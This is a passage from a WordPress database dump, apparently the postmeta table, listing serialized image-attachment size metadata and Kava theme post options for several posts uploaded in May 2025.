370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31340;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:14:\"Ty-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6335;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:15:\"Ty-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18446;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:15:\"Ty-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44283;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:15:\"Ty-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47112;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:15:\"Ty-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66250;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:15:\"Ty-600x324.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55258;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:15:\"Ty-640x584.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:584;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92277;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36779,5425,'_thumbnail_id','5426'),(36780,5425,'_edit_last','38'),(36781,5425,'kava_extra_enable_breadcrumbs','inherit'),(36782,5425,'post_formats',''),(36783,5425,'gallery_tab',''),(36784,5425,'kava_extra_gallery_images',''),(36785,5425,'link_tab',''),(36786,5425,'kava_extra_link',''),(36787,5425,'kava_extra_link_target','_blank'),(36788,5425,'quote_tab',''),(36789,5425,'kava_extra_quote_text',''),(36790,5425,'kava_extra_quote_cite',''),(36791,5425,'audio_tab',''),(36792,5425,'kava_extra_audio',''),(36793,5425,'kava_extra_audio_loop','false'),(36794,5425,'kava_extra_audio_autoplay','false'),(36795,5425,'kava_extra_audio_preload','false'),(36796,5425,'video_tab',''),(36797,5425,'kava_extra_video_type','library'),(36798,5425,'kava_extra_video_library',''),(36799,5425,'kava_extra_video_external',''),(36800,5425,'kava_extra_video_poster',''),(36801,5425,'kava_extra_video_width','770'),(36802,5425,'kava_extra_video_height','480'),(36803,5425,'kava_extra_video_loop','false'),(36804,5425,'kava_extra_video_autoplay','false'),(36805,5425,'kava_extra_video_preload','false'),(36806,5428,'_edit_lock','1747769304:38'),(36807,5428,'_last_editor_used_jetpack','block-editor'),(36808,5429,'_wp_attached_file','2025/05/b80f741a-5bbe-4813-ac8e-49d47fc72a0f.jpeg'),(36809,5429,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:49:\"2025/05/b80f741a-5bbe-4813-ac8e-49d47fc72a0f.jpeg\";s:8:\"filesize\";i:246101;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19954;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129466;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8421;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83905;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:51:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:236915;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26711;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5819;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16204;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38128;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40815;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55848;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129318;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:51:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:253773;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58288;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77219;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:50:\"b80f741a-5bbe-4813-ac8e-49d47fc72a0f-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133632;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36812,5428,'_thumbnail_id','5429'),(36813,5428,'_edit_last','38'),(36814,5428,'kava_extra_enable_breadcrumbs','inherit'),(36815,5428,'post_formats',''),(36816,5428,'gallery_tab',''),(36817,5428,'kava_extra_gallery_images',''),(36818,5428,'link_tab',''),(36819,5428,'kava_extra_link',''),(36820,5428,'kava_extra_link_target','_blank'),(36821,5428,'quote_tab',''),(36822,5428,'kava_extra_quote_text',''),(36823,5428,'kava_extra_quote_cite',''),(36824,5428,'audio_tab',''),(36825,5428,'kava_extra_audio',''),(36826,5428,'kava_extra_audio_loop','false'),(36827,5428,'kava_extra_audio_autoplay','false'),(36828,5428,'kava_extra_audio_preload','false'),(36829,5428,'video_tab',''),(36830,5428,'kava_extra_video_type','library'),(36831,5428,'kava_extra_video_library',''),(36832,5428,'kava_extra_video_external',''),(36833,5428,'kava_extra_video_poster',''),(36834,5428,'kava_extra_video_width','770'),(36835,5428,'kava_extra_video_height','480'),(36836,5428,'kava_extra_video_loop','false'),(36837,5428,'kava_extra_video_autoplay','false'),(36838,5428,'kava_extra_video_preload','false'),(36839,5431,'_wp_attached_file','2025/05/7828d91f-2287-4db7-9a8d-5e290c7b43c5.jpeg'),(36840,5431,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:49:\"2025/05/7828d91f-2287-4db7-9a8d-5e290c7b43c5.jpeg\";s:8:\"filesize\";i:116944;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18999;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-1024x576.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135848;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9068;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87406;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31447;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6341;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17623;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41231;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43637;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65148;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-600x338.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59823;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"7828d91f-2287-4db7-9a8d-5e290c7b43c5-640x608.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:608;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89560;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36843,5420,'_thumbnail_id','5431'),(36844,5420,'_edit_last','38'),(36845,5420,'kava_extra_enable_breadcrumbs','inherit'),(36846,5420,'post_formats',''),(36847,5420,'gallery_tab',''),(36848,5420,'kava_extra_gallery_images',''),(36849,5420,'link_tab',''),(36850,5420,'kava_extra_link',''),(36851,5420,'kava_extra_link_target','_blank'),(36852,5420,'quote_tab',''),(36853,5420,'kava_extra_quote_text',''),(36854,5420,'kava_extra_quote_cite',''),(36855,5420,'audio_tab',''),(36856,5420,'kava_extra_audio',''),(36857,5420,'kava_extra_audio_loop','false'),(36858,5420,'kava_extra_audio_autoplay','false'),(36859,5420,'kava_extra_audio_preload','false'),(36860,5420,'video_tab',''),(36861,5420,'kava_extra_video_type','library'),(36862,5420,'kava_extra_video_library',''),(36863,5420,'kava_extra_video_external',''),(36864,5420,'kava_extra_video_poster',''),(36865,5420,'kava_extra_video_width','770'),(36866,5420,'kava_extra_video_height','480'),(36867,5420,'kava_extra_video_loop','false'),(36868,5420,'kava_extra_video_autoplay','false'),(36869,5420,'kava_extra_video_preload','false'),(36870,5433,'_edit_lock','1748326572:38'),(36871,5433,'_last_editor_used_jetpack','block-editor'),(36872,5434,'_wp_attached_file','2025/05/1bd26c9a-97da-444b-bce0-a9e60c855b56.jpeg'),(36873,5434,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:591;s:4:\"file\";s:49:\"2025/05/1bd26c9a-97da-444b-bce0-a9e60c855b56.jpeg\";s:8:\"filesize\";i:84222;s:5:\"sizes\";a:13:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-300x139.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10818;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-1024x473.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69431;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6274;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-768x355.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:355;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45581;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20153;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4492;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11763;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27136;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27956;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41294;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-1170x591.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93913;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-600x277.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30998;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"1bd26c9a-97da-444b-bce0-a9e60c855b56-640x591.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:591;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51895;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36876,5433,'_thumbnail_id','5434'),(36877,5433,'_edit_last','38'),(36878,5433,'kava_extra_enable_breadcrumbs','inherit'),(36879,5433,'post_formats',''),(36880,5433,'gallery_tab',''),(36881,5433,'kava_extra_gallery_images',''),(36882,5433,'link_tab',''),(36883,5433,'kava_extra_link',''),(36884,5433,'kava_extra_link_target','_blank'),(36885,5433,'quote_tab',''),(36886,5433,'kava_extra_quote_text',''),(36887,5433,'kava_extra_quote_cite',''),(36888,5433,'audio_tab',''),(36889,5433,'kava_extra_audio',''),(36890,5433,'kava_extra_audio_loop','false'),(36891,5433,'kava_extra_audio_autoplay','false'),(36892,5433,'kava_extra_audio_preload','false'),(36893,5433,'video_tab',''),(36894,5433,'kava_extra_video_type','library'),(36895,5433,'kava_extra_video_library',''),(36896,5433,'kava_extra_video_external',''),(36897,5433,'kava_extra_video_poster',''),(36898,5433,'kava_extra_video_width','770'),(36899,5433,'kava_extra_video_height','480'),(36900,5433,'kava_extra_video_loop','false'),(36901,5433,'kava_extra_video_autoplay','false'),(36902,5433,'kava_extra_video_preload','false'),(36903,5436,'_edit_lock','1748327673:38'),(36904,5436,'_last_editor_used_jetpack','block-editor'),(36905,5437,'_wp_attached_file','2025/05/f7dac883-df04-4d91-b784-e496c830603c.jpeg'),(36906,5437,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:49:\"2025/05/f7dac883-df04-4d91-b784-e496c830603c.jpeg\";s:8:\"filesize\";i:300751;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18357;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"f7dac883-df04-4d91-b784-e496c830603c-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139139;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7253;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85635;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:51:\"f7dac883-df04-4d91-b784-e496c830603c-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:279066;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24807;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:48:\"f7dac883-df04-4d91-b784-e496c830603c-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4716;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14100;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35161;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39448;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54352;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:50:\"f7dac883-df04-4d91-b784-e496c830603c-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128117;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:51:\"f7dac883-df04-4d91-b784-e496c830603c-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:301132;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57663;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:49:\"f7dac883-df04-4d91-b784-e496c830603c-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75428;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:50:\"f7dac883-df04-4d91-b784-e496c830603c-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131670;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36907,5438,'_wp_attached_file','2025/05/New-for-yesterday.jpeg'),(36908,5438,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1342;s:4:\"file\";s:30:\"2025/05/New-for-yesterday.jpeg\";s:8:\"filesize\";i:560764;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-300x252.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27856;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"New-for-yesterday-1024x859.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:859;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271675;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9084;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-768x644.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163818;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:32:\"New-for-yesterday-1536x1288.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1288;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:521459;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36309;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:29:\"New-for-yesterday-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5938;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19969;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56296;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65883;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89770;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:31:\"New-for-yesterday-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"ima